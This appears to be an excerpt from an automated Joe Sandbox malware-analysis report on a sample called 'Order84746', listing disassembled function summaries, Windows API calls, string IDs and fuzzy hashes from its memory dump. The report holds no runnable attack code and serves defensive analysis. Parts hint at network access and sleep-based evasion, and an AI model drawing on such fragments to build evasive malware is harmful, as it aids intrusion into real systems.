                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ContainedObject
                          • String ID: AutoIt3GUI$Container
                          • API String ID: 3565006973-3941886329
                          APIs
                          • Sleep.KERNEL32(00000000), ref: 008FBCDA
                          • GlobalMemoryStatusEx.KERNEL32 ref: 008FBCF3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: GlobalMemorySleepStatus
                          • String ID: @
                          • API String ID: 2783356886-2766056989
                          APIs
                            • Part of subcall function 008E44ED: __fread_nolock.LIBCMT ref: 008E450B
                          • _wcscmp.LIBCMT ref: 0092C65D
                          • _wcscmp.LIBCMT ref: 0092C670
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _wcscmp$__fread_nolock
                          • String ID: FILE
                          • API String ID: 4029003684-3121273764
                          APIs
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0094A85A
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0094A86F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: '
                          • API String ID: 3850602802-1997036262
                          APIs
                          • _memset.LIBCMT ref: 00935190
                          • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 009351C6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CrackInternet_memset
                          • String ID: |
                          • API String ID: 1413715105-2343686810
                          APIs
                          • DestroyWindow.USER32(?,?,?,?), ref: 0094980E
                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0094984A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$DestroyMove
                          • String ID: static
                          • API String ID: 2139405536-2160076837
                          APIs
                          • _memset.LIBCMT ref: 009251C6
                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00925201
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: InfoItemMenu_memset
                          • String ID: 0
                          • API String ID: 2223754486-4108050209
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __snwprintf
                          • String ID: , $$AUTOITCALLVARIABLE%d
                          • API String ID: 2391506597-2584243854
                          APIs
                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0094945C
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00949467
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: Combobox
                          • API String ID: 3850602802-2096851135
                          APIs
                            • Part of subcall function 008FD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008FD1BA
                            • Part of subcall function 008FD17C: GetStockObject.GDI32(00000011), ref: 008FD1CE
                            • Part of subcall function 008FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 008FD1D8
                          • GetWindowRect.USER32(00000000,?), ref: 00949968
                          • GetSysColor.USER32(00000012), ref: 00949982
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                          • String ID: static
                          • API String ID: 1983116058-2160076837
                          APIs
                          • GetWindowTextLengthW.USER32(00000000), ref: 00949699
                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009496A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: LengthMessageSendTextWindow
                          • String ID: edit
                          • API String ID: 2978978980-2167791130
                          APIs
                          • _memset.LIBCMT ref: 009252D5
                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 009252F4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: InfoItemMenu_memset
                          • String ID: 0
                          • API String ID: 2223754486-4108050209
                          APIs
                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00934DF5
                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00934E1E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Internet$OpenOption
                          • String ID: <local>
                          • API String ID: 942729171-4266983199
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: htonsinet_addr
                          • String ID: 255.255.255.255
                          • API String ID: 3832099526-2422070025
                          APIs
                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0091B7EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: ComboBox$ListBox
                          • API String ID: 3850602802-1403004172
                          APIs
                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 0091B6EB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: ComboBox$ListBox
                          • API String ID: 3850602802-1403004172
                          • Opcode ID: 77d3071371a9f77fc7a693b0b605b32221c794811aa7f00257f2cc5315b10dc7
                          • Instruction ID: 945d002f19f3a25b90c6761115e1b2b6c1ea813ef72bdc0d574f0b213cfea346
                          • Opcode Fuzzy Hash: 77d3071371a9f77fc7a693b0b605b32221c794811aa7f00257f2cc5315b10dc7
                          • Instruction Fuzzy Hash: FE01A771B41008ABDB04EBA9C952BFE73AEEF56354F10001DF502B31C1DB945E1997B5
                          APIs
                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 0091B76C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: ComboBox$ListBox
                          • API String ID: 3850602802-1403004172
                          • Opcode ID: 0842957d4534e90de0e1d73a27063f9794c8433cb0602e5dbdc393a1d80d8d07
                          • Instruction ID: ca138010f85d63e547c424fc291ce756959e382f0a375adcce0c460bb15dc581
                          • Opcode Fuzzy Hash: 0842957d4534e90de0e1d73a27063f9794c8433cb0602e5dbdc393a1d80d8d07
                          • Instruction Fuzzy Hash: 3001A272B41108BBCB00E7A8C902BFE73AEAB46344B500019B401B31D2DB645E4987B6
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ClassName_wcscmp
                          • String ID: #32770
                          • API String ID: 2292705959-463685578
                          • Opcode ID: 36cec881d9589c2991419377466d74a4193ee3a817315295c3d6c5acf5a9ee53
                          • Instruction ID: b766f85919cee4ed08144291180260c42d3cea41cc2ec68fce3b305656010214
                          • Opcode Fuzzy Hash: 36cec881d9589c2991419377466d74a4193ee3a817315295c3d6c5acf5a9ee53
                          • Instruction Fuzzy Hash: 44E0D17760432567DB10DAD5DC05F87FBACEB95764F004116F515D3041D670D60187D0
                          APIs
                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0091A63F
                            • Part of subcall function 009013F1: _doexit.LIBCMT ref: 009013FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Message_doexit
                          • String ID: AutoIt$Error allocating memory.
                          • API String ID: 1993061046-4017498283
                          • Opcode ID: 27212f60d5b591044dd39edc345441d0e43d1a3493a2e425645f79cff9b774be
                          • Instruction ID: 324853dc6a8329e1251ca9e011d382c4ac3328cae04f3b8e405dfb156227e3b8
                          • Opcode Fuzzy Hash: 27212f60d5b591044dd39edc345441d0e43d1a3493a2e425645f79cff9b774be
                          • Instruction Fuzzy Hash: 11D05B323C972C37D21436AD6D17FD5764CDF55B99F144015FB0CD55C24DD2998041EA
                          APIs
                          • GetSystemDirectoryW.KERNEL32(?), ref: 0095ACC0
                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0095AEBD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DirectoryFreeLibrarySystem
                          • String ID: WIN_XPe
                          • API String ID: 510247158-3257408948
                          • Opcode ID: f1ce76ed0acb56301348c4f96d8179a02cb44342c3801d6f479fdefd2c2944b7
                          • Instruction ID: 74c2bf276393f7ce5827db4e822947a22ce0099f45df81fcaa2b4f89d11a71dc
                          • Opcode Fuzzy Hash: f1ce76ed0acb56301348c4f96d8179a02cb44342c3801d6f479fdefd2c2944b7
                          • Instruction Fuzzy Hash: 5FE06570C14109DFCB11DBA6D9449ECF7BCAB48301F108185E562B2160C7B45A48DF25
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009486A2
                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009486B5
                            • Part of subcall function 00927A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00927AD0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          • Opcode ID: 6d60b8dcc13afe1597fc44fce14cf8bb21ba82ec9906132ebee9eed8cab90494
                          • Instruction ID: 2b0deee388ea94ab4899a8890bafb6682559c81c6c6f70e30d31dc2a6b5da002
                          • Opcode Fuzzy Hash: 6d60b8dcc13afe1597fc44fce14cf8bb21ba82ec9906132ebee9eed8cab90494
                          • Instruction Fuzzy Hash: EFD02231B99324B7E2346770EC0BFC67A089B44B20F00080CF30AAA0D0C8E0E900C710
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009486E2
                          • PostMessageW.USER32(00000000), ref: 009486E9
                            • Part of subcall function 00927A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00927AD0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          • Opcode ID: a789a60eb412d574b99108983fa95a8e885777f3d2a1b2d8193460442fed5307
                          • Instruction ID: bd3df1548c2e8d691d2e46a070003925b7fc923ae0caff1adf6f65ade3f0b04d
                          • Opcode Fuzzy Hash: a789a60eb412d574b99108983fa95a8e885777f3d2a1b2d8193460442fed5307
                          • Instruction Fuzzy Hash: 54D02231B8A3247BF2346770EC0BFC67A089B48B20F00080CF30AEA0D0C8E0E900C715